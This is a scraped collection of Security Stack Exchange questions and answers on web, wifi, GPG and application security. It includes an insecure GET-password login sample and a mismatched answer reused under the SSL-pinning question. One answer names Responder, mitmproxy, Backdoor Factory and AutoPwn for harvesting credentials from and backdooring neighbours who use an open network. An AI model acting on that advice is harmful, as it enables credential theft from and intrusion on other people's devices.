kind of game where verifying game state is a requirement) isn't easy. The problem isn't really even a security one, it's a usability and performance one. The simplest way to secure a multiplayer game is to keep the entire game state on the server side, have all the game logic executed and maintained there, and have the client do nothing but send player input over to the server ("user clicked the mouse, user is holding W key") and present the audio and video back to the player. The problem with doing this is that it doesn't make for a very fun game due to network latency, and it's quite hard to scale on the server side. Instead, you have to find a balance between keeping things client-side and server-side. For example, the logic for "does the player have a key to open this door?" must be checked server side, but the logic of when to show the context icon for "open door" stays on the client side. Again, things like enemy health and position must be kept on the server side, and the player's ability to deal damage to that enemy must also be verified (is it near enough?) which means that AI can't be kept client-side, but things like the choice of which idle animation the enemy is displaying will probably be a client-side thing. We have a few questions on here about game security, so I suggest reading through those: Preventing artificial latency or "Lag Hacking" in multiplayer games Secure Software: How to ensure caller is authentic? Securely sending packets without them being spoofed Checking a locally stored string for tamper I also recommend these questions over at GameDev SE: How can a web game store points online without giving the user the possibility to do the same call but with more points? (almost literally your question) What are some ways to prevent or reduce cheating in online multiplayer games? How should multiplayer games handle authentication? There's also a great paper on multiplayer security from BlackHat EU 2013, and an article on non-authoritative P2P networking , which may both be of use. | {
"source": [
"https://security.stackexchange.com/questions/147043",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/82333/"
]
} |
147,057 | Given a website with various security flaws, one of them is session hijacking, session token continuously being sent as an argument over unsecured HTTP. In my field it's not surprising that others sniff networks I use, so I contacted the owner of this site and notified them of the vulnerabilities and suggested that they should use TLS encryption. Some arrogant guy replied that they know it better and it's not my business anyways. Since it's not always possible for me to use VPN when I access this site, my question as a regular user is, are there other reliable ways to defend against people stealing my session? | Here are some suggestions. None of this will give you the same level of security as TLS would, though. Don't use the site unless you really have to. But since you ask, I assume you do. If you visit it, use a VPN (or Tor) as often as possible. An attacker would have to get in the middle of your VPN exit and the server in question, which is harder than getting in the middle of you and the server (but not impossible, especially not for a governmnet - or the provider of the VPN/Tor exit node...). If you don't use a VPN, at least don't use it over Wi-Fi. That is so much easier to sniff than a cable network. Stay logged in for as short periods of time as possible, and always logg out when you are done. Don't check the "remember me" box. Unless the login page is over HTTPS, you should be more worried about your password then your session ID... If the login page is over HTTPS, always check that you have a secure connection so you don't become a victim of SSL-strip. Depending on how likely you think it is that you will be the target of an attack this may or may not be enough. I am afraid there is not much else you can do. | {
"source": [
"https://security.stackexchange.com/questions/147057",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/52758/"
]
} |
147,077 | I am using this Cordova plugin to implement SSL pinning in an Android application. I don't know how to simulate the environment for testing if it's working fine. The infosec team in my firm is telling me that if the connection is proxied (no other attacking thing), then the application will be getting another certificate from the proxy server and the app should alert about this. But the above plugin tells me that the connection is secure even on proxied connections. | Here are some suggestions. None of this will give you the same level of security as TLS would, though. Don't use the site unless you really have to. But since you ask, I assume you do. If you visit it, use a VPN (or Tor) as often as possible. An attacker would have to get in the middle of your VPN exit and the server in question, which is harder than getting in the middle of you and the server (but not impossible, especially not for a governmnet - or the provider of the VPN/Tor exit node...). If you don't use a VPN, at least don't use it over Wi-Fi. That is so much easier to sniff than a cable network. Stay logged in for as short periods of time as possible, and always logg out when you are done. Don't check the "remember me" box. Unless the login page is over HTTPS, you should be more worried about your password then your session ID... If the login page is over HTTPS, always check that you have a secure connection so you don't become a victim of SSL-strip. Depending on how likely you think it is that you will be the target of an attack this may or may not be enough. I am afraid there is not much else you can do. | {
"source": [
"https://security.stackexchange.com/questions/147077",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/50336/"
]
} |
147,111 | Looking at the count of CVE reports by product , I'm tempted to use it as an indicator of which programs are the most secure, and choose the ones I install accordingly. But I wonder if these numbers are misleading. For example, the Linux kernel is second in the list and Windows 10 is not even mentioned. I suppose it's in part because of the open source nature of Linux, which makes finding and fixing the flaws easier and faster, increasing the number of CVEs. Another thing that I find interesting is that, while Chrome has more vulnerabilities listed in 2016 than Firefox, there are a lot more code execution flaws in Firefox, while a big part of Chrome's flaws are DoS attacks, which are way less severe. Can we say that a software is "more secure" than another, based on the number of CVEs these softwares have ? | Can we say that a software is "more secure" than another, based on the number of CVEs these softwares have? No. CVE entries are not a good source to rank products by their "overall security". The main idea behind the CVE system is to create unique identifiers for software vulnerabilities. It's not designed to be a complete and verified database of all known vulnerabilities in any product. That is, a vendor or researcher could simply decide to not request a CVE number for a given flaw. Further, entries sometimes combine related bugs under a single ID or don't disclose the exact impact, making a simple "bug count" a rather meaningless security criterion. Also, for a ranking you'd have to find sensible metrics to compare different severities. (How many DoS bugs equal a remote code execution...?) That said, CVEs do surely give you an idea about what kind of vulnerabilities have been found in a product and they're a good starting point for research. But the amount strongly depends on the age of the software and how much attention it receives through security auditing. You can't really reason if a lot of CVE assignments means that the software is poorly written or if it actually means that it's particularly secure because evidently a lot of vulnerabilities are getting fixed. I personally tend to find it suspicious if an older product has a very short record of patched vulnerabilities because that could indicate it hasn't been audited thoroughly. So you should think of CVE as a dictionary rather than a database that simply assigns handles to vulnerabilities so that you can reference them easier — don't use it as a tool to compare security. Here are some better indicators for a secure product: The software is used and developed actively. The vendor encourages people to search for vulnerabilities (and maybe even offers bounties). New security bugs are processed and patched quickly. | {
"source": [
"https://security.stackexchange.com/questions/147111",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/83600/"
]
} |
147,144 | A CNN article on the recent US Election hacks claims that ...the administration has traced the hack to the specific keyboards -- which featured Cyrillic characters -- that were used to construct the malware code, adding that the equipment leaves "digital fingerprints" and, in the case of the recent hacks, those prints point to the Russian government. Now to me that sounds like total baloney. You're going to trace a character, which may in some executable code back to a specific keyboard? And you're going to know that its one particular model that is physically in one particular location? Is this nonsense or is there something I'm missing here? Wouldn't it also be trivial to spoof whatever is the source of this info? | A keyboard is not a typewriter. Keyboards produce scancodes that are interpreted by the software and mapped depending on your layout. When a key press produces a letter on your screen it's nothing more than the character value in its respective charset - keyboards don't leave "digital fingerprints" that could be traced back. Instead, the author probably meant to say that they found strings or identifiers with Cyrillic letters in the source code. But such traces are easy to fake and wouldn't count as "hard evidence"; even metadata could have been planted. Here's a similar case: After the Operation Aurora cyber attacks, analysts claimed they had found "Chinese source code" from which they concluded that the attack was led from China: HBGary, a security firm, recently released a report in which they claim to have found some significant markers that might help identify the code developer. The firm also said that the code was Chinese language based but could not be specifically tied to any government entity. Here, the case was actually stronger than the Cyrillic keyboard evidence as researchers could trace back parts of the code to a reference implementation that was only released in a Chinese paper: Perhaps the most interesting aspect of this source code sample is that it is of Chinese origin, released as part of a Chinese-language paper on optimizing CRC algorithms for use in microcontrollers. [...] This CRC-16 implementation seems to be virtually unknown outside of China (Source) | {
"source": [
"https://security.stackexchange.com/questions/147144",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/49767/"
]
} |
147,166 | Google and many other sites know my correct location. How can I fake my location without using a VPN, proxy, Tor or similar? I went to about:config and looked for geo. What I think I have to modify is geo.wifi.uri ? Maybe we can put in false lattitude and longitude values directly? If so, how would it look then? I really have no idea about the format. Or is there another way using JavaScript in Greasemonkey? | Faking the Geolocation You can spoof the location provided via the HTML5 Geolocation API this way: Go to about:config . Type in geo.provider.network.url (or geo.wifi.uri in older versions) Change the value to something like this: data:application/json,{"location": {"lat": 40.7590, "lng": -73.9845}, "accuracy": 27000.0} (The lat and lng values determine the latitude and longitude of your location. Confirm that geo.enabled is true . You may also need to set geo.provider.testing to true . (Create the key if it doesn't exist.) Congratulations, you're now on Times Square! (Verify the result here .) Note: This does not stop websites from deriving the location from your IP address. You can't do that on the application layer and would have to go with a proxy instead. Disabling the Geolocation For privacy reasons, you may want to prevent use of the API entirely: Go to about:config and set geo.enabled to false . Some technical details The Geolocation service in Firefox is set up in dom/geolocation/Geolocation.cpp . Following nsGeolocationService::Init() you see that without geo.enabled , the API initialization is aborted right away: if (!StaticPrefs::geo_enabled()) {
return NS_ERROR_FAILURE;
} Further, the browser chooses between different location providers based on your platform and settings. As you see, there are prefs to switch them individually (e.g., if you're on MacOS, you can set geo.provider.use_corelocation to false to disable geolocating via Apple's Core Location API ): #ifdef MOZ_WIDGET_ANDROID
mProvider = new AndroidLocationProvider();
#endif
#ifdef MOZ_WIDGET_GTK
# ifdef MOZ_GPSD
if (Preferences::GetBool("geo.provider.use_gpsd", false)) {
mProvider = new GpsdLocationProvider();
}
# endif
#endif
#ifdef MOZ_WIDGET_COCOA
if (Preferences::GetBool("geo.provider.use_corelocation", true)) {
mProvider = new CoreLocationLocationProvider();
}
#endif
#ifdef XP_WIN
if (Preferences::GetBool("geo.provider.ms-windows-location", false) &&
IsWin8OrLater()) {
mProvider = new WindowsLocationProvider();
}
#endif
if (Preferences::GetBool("geo.provider.use_mls", false)) {
mProvider = do_CreateInstance("@mozilla.org/geolocation/mls-provider;1");
} Only if none of the platform-specific providers apply, or if geo.provider.testing is true , Firefox defaults to the network (URL-based) provider: if (!mProvider || Preferences::GetBool("geo.provider.testing", false)) {
nsCOMPtr<nsIGeolocationProvider> geoTestProvider =
do_GetService(NS_GEOLOCATION_PROVIDER_CONTRACTID);
if (geoTestProvider) {
mProvider = geoTestProvider;
}
} The network provider ( dom/system/NetworkGeolocationProvider.jsm ) then requests the URL specified in geo.provider.network.url . You could set up your own mock HTTP location serivce and enter its URL here. But more easily, as in the steps at the top, it's sufficient use a data: pseudo URI to mimic a network provider that unconditionally responds with your desired location details. | {
"source": [
"https://security.stackexchange.com/questions/147166",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/126235/"
]
} |
147,188 | I work on web applications and as you know, having an administrator panel is a must in most cases. We can see that a lot of web applications have a specific login page for administrators in which there is a form (usually POST method) that admins can use to login their panel. But because the field names are known, a hacker can attempt to crack the passwords even if some security methods are implemented. So what is the problem with a simple GET key (as username) and its value (as password)? Why it's not used a lot or at least, is not suggested in many articles? For administrators, user-friendly login pages are not really needed! Data will be logged in both cases ( GET / POST ) if there is a MiTM attacker. But using this method, fields will be unknown expect for admins themselves.
Here is a sample PHP code: "category.php": (A meaningless page name) <?php
if (isset($_GET['meaningless_user']) && $_GET['meaningless_word'] == "something"){
session_start();
$_SESSION["user"] = "test";
header('Location: category.php'); // Redirect to same or other page so GET parameters will disappear from the url
} else {
die(); // So it'll be like a blank page
}
?> | This would store the login link with password and username in the browsers history. It could also be accidentally be captured by things like firewall logs, that wouldn't capture post variables. | {
"source": [
"https://security.stackexchange.com/questions/147188",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/42412/"
]
} |
147,216 | I'm working on a website — right now it's in early stages of testing, not yet launched and just has test data - thank goodness. First of all, a hacker figured out the password to log onto the websites 'administration' pages * . I think they used a key logger on a friend's computer who logged into the site to give me feedback. Secondly, they used a picture upload box to upload a PHP file. I have put in strict checking so that only .jpg and .png files are accepted — everything else should have been rejected. Surely there is no way to upload a .jpg file and then change the extension once the file is stored? Thankfully I also generate new file names when a file is sent to me, so I don't think they were able to locate the file to execute the code. I just can't seem to figure out how the website let a PHP file through. What's wrong with my security? The validation function code is below: function ValidateChange_Logo(theForm)
{
var regexp;
if (theForm.FileUpload1.value == "")
{
alert("You have not chosen a new logo file, or your file is not supported.");
theForm.FileUpload1.focus();
return false;
}
var extension = theForm.FileUpload1.value.substr(theForm.FileUpload1.value.lastIndexOf('.'));
if ((extension.toLowerCase() != ".jpg") &&
(extension.toLowerCase() != ".png"))
{
alert("You have not chosen a new logo file, or your file is not supported.");
theForm.FileUpload1.focus();
return false;
}
return true;
} Once the file gets to the server, I use the following code to retain the extension, and generate a new random name. It is a bit messy, but it works well. // Process and Retain File Extension
$fileExt = $_FILES[logo][name];
$reversed = strrev($fileExt);
$extension0 = substr($reversed, 0, 1);
$extension1 = substr($reversed, 1, 1);
$extension2 = substr($reversed, 2, 1);
$fileExtension = ".".$extension2.$extension1.$extension0;
$newName = rand(1000000, 9999999) . $fileExtension; I've just tested with a name such as logo.php;.jpg and although the picture cannot be opened by the website, it correctly changed the name to 123456.jpg . As for logo.php/.jpg , Windows doesn't allow such a file name. * Protected pages on the website that allow simple functions: like uploading a picture that then becomes a new logo for the website. FTP details are completely different to the password used to log onto the protected pages on the website. As are database and cPanel credentials. I've ensured that people can't even view the folder and file structure of the site. There is literally no way I can think of to rename a .jpg, or .png extension to .php on this site if you don't have FTP details. | Client side validation The validation code you have provided is in JavaScript. That suggests it is code that you use to do the validation on the client. Rule number one of securing webapps is to never trust the client . The client is under the full control of the user - or in this case, the attacker. You can not be sure that any code you send to the client is used for anything, and no blocks you put in place on the client has any security value what so ever. Validation on the client is just for providing a smooth user experience, not to actually enforce any security relevant constraints. An attacker could just change that piece of JavaScript in their browser, or turn scripts off completely, or just not send the file from a browser but instead craft their own POST request with a tool like curl. You need to revalidate everything on the server. That means that your PHP must check that the files are of the right type, something your current code doesn't. How to do that is a broad issue that I think is outside the scope of your question, but this question are good places to start reading. You might want to take a look at your .htaccess files as well. Getting the extension Not a security issue maybe, but this is a better way to do it: $ext = pathinfo($filename, PATHINFO_EXTENSION); Magic PHP functions When I store data from edit boxes, I use all three of PHP's functions to clean it: $cleanedName = strip_tags($_POST[name]); // Remove HTML tags
$cleanedName = htmlspecialchars($cleanedName); // Allow special chars, but store them safely.
$cleanedName = mysqli_real_escape_string($connectionName, $cleanedName); This is not a good strategy. The fact that you mention this in the context of validating file extensions makes me worried that you are just throwing a couple of security related functions at your input hoping it will solve the problem. For instance, you should be using prepared statements and not escaping to protect against SQLi. Escaping of HTML tags and special characters to prevent XSS needs to be done after the data is retrieved from the database, and how to do it depends on where you insert that data. And so on, and so on. Conclusion I am not saying this to be mean, but you seem to be doing a lot of mistakes here. I would not be surprised if there are other vulnerabilities. If your app handles any sensitive information I would highly recommend that you let someone with security experience have a look at it before you take it into production. | {
"source": [
"https://security.stackexchange.com/questions/147216",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/135185/"
]
} |
147,222 | I am sorry for my lack of knowledge in this matter. My university (basically an international university in the UK that has students from different countries) has a website which requires the students to login before they can access their examination results. These results also include their Name and Address. But by inspecting the network transaction, I found out that it went to a page that directly takes student registration number in the URL and displays the examination result related to that. This page can be accessed without logging in to the student account and without any hassle, it gave me the examination result that exposed the student name and address. I tried multiple registration numbers similar to mine and all were processed easily. Another problem is that these registration numbers are in fixed length, only contain numbers and are in ascending order. So for example if a valid registration number is 000001 then the next one would be 000002 and so on. So in my opinion an attacker can easily create an automated program that could generate these registration numbers, randomly or in order, and get the names and addresses of hundreds of students. My questions are: Is it universally approved practice for universities to expose the names and addresses of students? Is it universally approved practice for universities that strong security related to name and address is not important? Is it a severe attack and do I have to report it to them? Or can it simply be ignored? Update: I received the reply from the university and they have now fixed it. Thanks to all of you. | I am sorry for my lack of knowledge in this matter. You shouldn't be. Is it universally approved practice for universities to expose the name and addresses of students? As pointed out in comments, it depends on your local laws and regulations. You should certainly check it once. But the way you describe the application(changing the URL to get the details, including the result), it sounds like a bug, which should certainly be reported. Is it universally approved practice for universities that strong security related to name and address is not important? No, be it a university or a big MNC or a small enterprise, or your own personal account, security is ALWAYS important. Is it a severe attack and do I have to report it to them? Or it can be simply ignored? Yes, you have to report it to the university, as soon as possible. It should not be ignored. EDIT: As pointed out in comments, there are some universities which do allow students' addresses to be made public. | {
"source": [
"https://security.stackexchange.com/questions/147222",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/135190/"
]
} |
147,255 | Should failed login attempts be logged? My doubt is that if there is a distributed brute force attack, it might exhaust the available disk space of the database. What is the best practice for this? I'm protecting a public-facing web server with sensitive data. Based on the answers so far, one other question that occurred to me is whether web server logs would be enough for logging such attempts. Would it be redundant to log them in the database? | Yes, failed login attempts should be logged: You want to know when people are trying to get in You want to understand why your accounts are getting locked out It's also very important - older Windows logging process never emphasized this enough - to log successful login attempts as well. Because if you have a string of failed login attempts, you really really really should know if the last one was followed by a successful login. Logs are relatively small. If there was enough login attempts that logging would cause a problem, then "not knowing about the attempts" is probably a worse-case problem than "found out about them when we ran out of disk." A quick caveat - as @Polynomial points out, the password should not be logged (I seem to recall that 25 years ago some systems still did that). However, you also need to be aware that some legitimate login attempts will fail when people enter their password into the username field, so passwords do get logged. Doubt me? Trawl your logs for Windows Event ID 4768: LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4768
EventType=0
Type=Information
ComputerName=dc.test.int
TaskCategory=Kerberos Authentication Service
OpCode=Info
RecordNumber=1175382241
Keywords=Audit Failure
Message=A Kerberos authentication ticket (TGT) was requested.
Account Information:
Account Name: gowenfawr-has-a-cool-password
Supplied Realm Name: TEST.INT
User ID: NULL SID Correspondingly, you should limit access to these logs to the necessary people - don't just dump them into a SIEM that the whole company has read access to. Update to address question edit: Based on the answers so far, one other question that occurred to me is
whether web server logs would be enough for logging such attempts.
Would it be redundant to log them in the database? Best practices are that logs should be forwarded to a separate log aggregator in any case - for example, consider PCI DSS 10.5.4. In practice, such an aggregator is usually a SIEM, and functions like a database rather than flat log files. So, yes, it's "redundant" by definition, but it's the kind of redundancy that's a security feature, not an architectural mistake. The advantages of logging them into a database include searching, correlation, and summation. For example, the following Splunk search: source="/var/log/secure" | regex _raw="authentication failure;" | stats count by user,host Will allow us to roll up authentication failures by user and host: Note that the ability to query discrete fields like 'user' and 'host' is dependent upon the SIEM picking logs apart and understanding what means what. The accessibility of those fields here is a side effect of Splunk automagically parsing the logs for me. Given that your original question dealt with space constraints, it should be pointed out that any database or SIEM solution is going to take more disk space than flat text file logs. However, if you use such a solution, you'll almost always put it on a separate server for security and space management reasons. (There are even SIEM-in-the-cloud solutions now to make life easier for you!) | {
"source": [
"https://security.stackexchange.com/questions/147255",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/118278/"
]
} |
147,447 | When I run gpg --verify ~/file.asc ~/file I receive the following: gpg: Signature made Tue 10 Dec 2016 05:10:10 AM EST using RSA key ID abcdefgh
gpg: Good signature from "Alias (signing key) <[email protected]>"
gpg: WARNING: This key is not certified with a trusted signature!
gpg: There is no indication that the signature belongs to the owner.
Primary key fingerprint: (a fingerprint)
Subkey fingerprint: (a fingerprint) The primary fingerprint matches the output of gpg --fingerprints In my keyring I have: pub 4096R/abcdefgh 2014-12-12 [expires: 2020-08-02]
Key fingerprint = (A public finger print)
uid Alias (signing key) <[email protected]>
sub 4096R/xcdertyu 2014-12-11 [expires: 2017-08-11] I wanted to verify the authenticity of a file with the public key fingerprint. Note that the trust level is level 4 (full trust) I believe this because: :~$ gpg --edit-key abcdefgh
gpg (GnuPG) 1.4.18; Copyright (C) 2014 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
pub 4096R/abcdefgh created: 2014-12-12 expires: 2020-08-02 usage: C
trust: full validity: unknown Should there be a reason for concern? Thanks for your patience as I learn more about crypto! | The key needs to be verified. If you trust that someone's public key does in fact belong to that individual and they are in your keyring you can use your private key to sign your correspondent's public key and validate it. So you are Bob and you trust that Alice's public key does in fact belong to Alice, so you sign it with your private key. So Alice's key is trusted to you. Also any keys that Alice trusts, say someone called Chris will be in your web of trust also. So you can also trust Chris, because Alice does. So Chris’s key will be certified with a trusted signature. Now if Alice trusts that your key does belong to you then she can validate your public key with by signing it with her private key, therefore your key will now be included in that same web of trust. a procedure was given to validate your correspondents' public keys: a correspondent's key is validated by personally checking his key's
fingerprint and then signing his public key with your private key. By
personally checking the fingerprint you can be sure that the key
really does belong to him, and since you have signed they key, you can
be sure to detect any tampering with it in the future. Unfortunately,
this procedure is awkward when either you must validate a large number
of keys or communicate with people whom you do not know personally. GnuPG addresses this problem with a mechanism popularly known as the
web of trust. In the web of trust model, responsibility for validating
public keys is delegated to people you trust. For example, suppose Alice has signed Blake's key, and Blake has signed Chloe's key and Dharma's key. If Alice trusts Blake to properly validate keys that he signs, then
Alice can infer that Chloe's and Dharma's keys are valid without
having to personally check them. She simply uses her validated copy of
Blake's public key to check that Blake's signatures on Chloe's and
Dharma's are good. In general, assuming that Alice fully trusts
everybody to properly validate keys they sign, then any key signed by
a valid key is also considered valid. The root is Alice's key, which
is axiomatically assumed to be valid.
Trust in a key's owner In practice trust is subjective. For example, Blake's key is valid to
Alice since she signed it, but she may not trust Blake to properly
validate keys that he signs. In that case, she would not take Chloe's
and Dharma's key as valid based on Blake's signatures alone. The web
of trust model accounts for this by associating with each public key
on your keyring an indication of how much you trust the key's owner. There are four trust levels . unknown Nothing is known about the owner's judgement in key signing.
Keys on your public keyring that you do not own initially have this
trust level. none The owner is known to improperly sign other keys. marginal The owner understands the implications of key signing and
properly validates keys before signing them. full The owner has an excellent understanding of key signing, and his
signature on a key would be as good as your own. A key's trust level is something that you alone assign to the key, and
it is considered private information. It is not packaged with the key
when it is exported; it is even stored separately from your keyrings
in a separate database. The GnuPG key editor may be used to adjust
your trust in a key's owner. Read more here Also have a look at this awnser from Server Fault | {
"source": [
"https://security.stackexchange.com/questions/147447",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/122524/"
]
} |
147,463 | My bank recently revamped its website, and it changed for the better as far as I’m concerned. Especially, security seems to have been dramatically enhanced. Most importantly, they introduced a rather unusual (I’ve never seen this before) identification method, which they call the ‘electronic certificate’. Basically, you have to go to the bank in person and the guy gives you a tiny, cheap USB stick with a very low capacity. From this point, you’ll be required to plug the stick into your computer every time you want to log in. The stick alone is not enough, you also have to type your password — basically, 2-factor-authentification with a USB device being the second factor. How can this possibly work? Of course, I believe the USB stick to contain certificates/encryption keys of some kind, that are used in the login process, but they don’t require the user to install any software on the machine. I find it rather creepy that a website accessed from a sandboxed web browser, with no plug-in/module/app/toolbar installed whatsoever, can see the USB stick you just plugged in. And not only see this stick, but read it and use its content deeply enough to log you to the most sensitive level of your online banking app. I am not a big fan of plugging unknown devices into my computer to begin with, and my warning light flashed when this was explained to me, so I went for another identification method (you can choose). I’m just curious. PS: the measure obviously does not apply to their mobile apps, since smartphones don’t have USB ports, but that’s not a big deal because you cannot do much with their phone app (it's mainly a consultation app, not something you can actually make big payments/transfers with). Edit: no open file dialog is used, which would make the explanation quite clear. | What your bank gave you is an USB security token with a digital certificate ( like these ). These are standardized hardware devices which almost every operating system supports plug&play out of the box. They are very common for implementing multi-factor-authentication to high-security systems in enterprise IT. Your web browser uses HTTPS with client-based certificates to access your bank's website. It uses your operating systems certificate store to find an installed certificate which matches the identity the webserver requests. When you have a standard USB security token installed, the operating system will also look for any certificates on the token. The operating system can not do the verification process with the webserver by itself, because the token doesn't allow to read the private key of the certificates stored on it directly. The token includes the hardware to do the verification. So the private key never leaves the USB stick. That means even if your PC is compromised by malware, the private key of the certificate isn't in danger of being stolen (but keep in mind that this method doesn't provide any protection after the authentication was successful. Malware can still screw with your web browser). By the way: Which bank is that? If my bank would also support this authentication method, I might even start doing online banking. | {
"source": [
"https://security.stackexchange.com/questions/147463",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
147,820 | I recently purchased a satellite communicator that allows me to send a map of my location to friends and family while I'm hiking in the wilderness. While testing out my product, I noticed that the url was constructed as so: http://www.example.com/mylocation/?id=YYYYY/XX.XXXXN/XX.XXXXW Where X s are digits that are part of a physical latitude/longitude and the Y s are part of a 5 character alphanumeric ID. Being curious, I truncated the latitude/longitude part of the URL and changed the ID by one character. http://www.example.com/mylocation/?id=YYYYZ By doing this, I could then see a different user's: physical latitude/longitude location on a map device name (whatever they chose to call it; most people have something like "Harry's GPS") custom pre-set message used while sending their location, if they have one set (ex: "Checking in - I'm safe.") My question is, does this present a security flaw, and should the company be alerted about this? My argument for contacting the company would be that seeing other users' physical locations is a blatant flaw; however, that's the entire point of the product - to easily share your location with your family/friends. I also can't see whom the device actually belongs to (name, phone number, username, email, etc.), so the location data is anonymised as far as I can tell. | Yes, you should notify the problem to the company - with caution. Update: a shorter, very complete answer was supplied by @crovers . But if you have patience... ...the problem here is not simply the possibility of tracking J. Random Stranger, but rather that: once your ID has been given to someone, apparently you cannot take it back and it does not expire. That person can now follow you everywhere (think " overly attached girlfriend "). Also, that ID may leak. Emails get forwarded by mistake and sometimes the little, easily overseen ... glyph in mail programs covers lots of sensitive information. you don't even need to give it to me. If the IDs are sequential [as commented by @crovers], I can tabulate all of them in very little time, check their position, and easily single out those five or six that are near enough to the position I know you might be in. Tomorrow, other five or six will be near enough a different place you're now in; of those five, maybe two were in the original five, so you must be one of those two. In a comparatively little time I've narrowed my candidates to one : I now have your ID and can stalk you, and you are none the wiser . I may even not know you. The ID can be used to prank total strangers. I just googled a bit and found a couple thousand Facebook users that boasted of their new (NAME OF GPS-RELATED GADGET). I used a very well known brand, so your gadget will have maybe only one hundred people that I can discover easily. A full half of those, I'm confident, will routinely post pictures about where they are ( does Facebook purge EXIF GPS information? ).
In a very little while, one of them that caught my fancy might receive a message stating "How's the weather in Old Nowhereville?" even if he (or she) never said anything to anyone about where he (or she) was, nor even posted anything anywhere. Such pranks - and knowing that some total stranger is apparently interested in you, and always seems to know where you are - can totally ruin your day.
And they can totally ruin the company's day, if some pranked people get convinced that their GPS can somehow be "hacked remotely", even if, as in this case, that's not what's happening at all. Yes, I have a sick mind - but I'm not the only one, so you might want to point the company's people to this page - and, to restate another very good point made by @crovers and Arminius, do so anonymously . The potential damage to them is huge, and you're doing them a big favor by pointing this to them . But some companies might have a (knee-)jerk reaction and try to bully you into silence believing this solves something (or even solves the matter entirely); Nobel Prize Richard P. Feynman's "vulnerability disclosure" story makes for a hilarious reading (" That was his solution: I was the danger! ") . You're actually helping them. trust me, lots and lots of people would do exactly what you did when seeing "id=XXXXX" in a URL. I would have done it. Depending on the gadget's popularity, I'd wager many others will already have done so. So it's not like you're unleashing a zombie apocalypse over someone which otherwise would have remained safe - you'll probaby simply be the first to have had the conscience of telling them they are not safe at all . Because that's significantly rarer than having the curiosity of changing a ID. It totally hadn't to be like this. It is trivially simple, from the company's point of view, to fix this by allowing each user to regenerate a different secret ID on demand any time they choose. And even set an expiration date. And they still could do it now . A very quick fix could be to proxy their website through a simple filter, connected with a database. Your new URL is, say, http://www.example.com/mylocation/?id=22b255b332474ae3e7f008cc50ebe3e0&.. . or one could translate that to "true.pony.pile.main.jazz.call.mine.soft.pink.rake.jane" to get something more easily remembered or dictated over a phone. the first four words are somewhat connected to "correct horse battery staple" . The proxy checks in a database and finds that 22b255b332474ae3e7f008cc50ebe3e0 is a valid ID, and is associated to "real" (or "old") id 12345 , so it transforms the URL by simply replacing the ID with 12345, sends the request to the true, hidden website, gets the page back, rewrites any 12345's with the original 22b2... stuff, and hey presto! , the external user can see where you are, same page as before, but he has no way of knowing that the true ID is 12345 (and, even if he knew, he'd have no way of getting it through to the system, which now only accepts hashes). But now, user 12345 can have as many IDs active as the company wants (or sells !), and give one to his mom, one to his SO, and so on. One ID leaks, or he breaks up with his friend -- he invalidates that one ID. It also becomes possible to know how many accesses there have been to each ID, so the snooping can be two-way. Possibly for premium users only :-D. For some IDs, the website may even release randomized information, or low-precision GPS coordinates. And if you wanted to guess at random a valid ID - well, there are some 2 128 of those. If each customer had one hundred disposable IDs (say 2 7 ), and the company had one billion customers (say 2 30 ), there would still be approximately one possibility over 2 90 to get a valid ID by trying at random. If that's too little (or if my math happened to be a bit askew), there are larger hashes too. And the old ID no longer works since you can't reach the original server without the ID you supply getting hashed. Given the reasonable implementation cost (a couple day's worth for one developer and one QA engineer, and I'm padding heavily ), I'm a bit baffled that this wasn't designed in from the start. | {
"source": [
"https://security.stackexchange.com/questions/147820",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/44995/"
]
} |
147,928 | I went to sign into a website today using Google Chrome and was presented with the following error: Your connection to this site is not fully secure Attackers might be able to see the images you're looking at on this site and trick you by
modifying them When I clicked the Details link It says the following The site includes HTTP resources I have never seen this warning before. What does this warning mean in laymans terms and should I sign into the website with my username and password? Extra: Opening the same page in Microsoft Edge it claims the website is secure | In a nutshell, it is saying that while the core of the page is using https (secure) to get that information to your computer, that (secure) page references insecure elements (like pictures and possibly scripts). Attackers can't directly change the original page, but they can change the insecure elements. If those are pictures, they can change the image. If those are scripts, they can change those, too. In that way, attackers could change what you see, even though the core page was 'secure'. As Michael Kjörling points out in the comments, this also exposes some of your information in these requests - potentially cookies (if it is the same site / matches the cookie sites / the developer didn't specify secure only), referrers, etc, which will leak some information about what you are doing at the best case and at the worse may allow certain attacks. This is bad practice on the part of the web developer - all elements should use secure transport. You could (potentially) improve your own situation using a browser plugin that auto-updates all requests to http to https. | {
"source": [
"https://security.stackexchange.com/questions/147928",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/87457/"
]
} |
148,015 | I noticed our Internet was bogged down. I checked the IP addresses of all devices connected and found the MAC addresses of the culprits: Question: How to find their geographical location based on the MAC addresses? I know they are in the neighborhood of Columbia, Md. 21045. One of them is an iPhone and another is an Android phone which would should allow GPS triangulation, but that option is only available to the carrier and law enforcement. | Physically finding them is not easy. If you are really willing to catch them, buy a couple ESP8266 modules (search eBay for them), research this project a little, drop a couple modules around and you can probably find them. But will cost a lot of time, effort and some money. Even if you cannot physically locate them, you can play some tricks with them: Install a captive portal, saying the network is an experiment on automated hacking and ask user to only continue if they agree. Ask for email or Facebook auth, or ask for a phone number to send a PIN to login. Install something like Upside Down Ternet , Backdoor Factory or AutoPwn . Put QoS in place on your router, and 1kbps bandwidth for anyone outside of a list. Install Responder along with mitmproxy , get all auth data you can. My network is pretty secure, but sometimes I think about installing a WEP wifi network just to play around with internet thieves. | {
"source": [
"https://security.stackexchange.com/questions/148015",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/135991/"
]
} |
148,189 | I went to download the latest firmware for my router and noticed the download link is not HTTPS, so I sent the following email to the manufacturer: I went to look for new firmware for my Archer C7 router, but I saw
that the download link is over unencrypted HTTP, not secure HTTPS. I
would never download software or firmware over an unsecure connection.
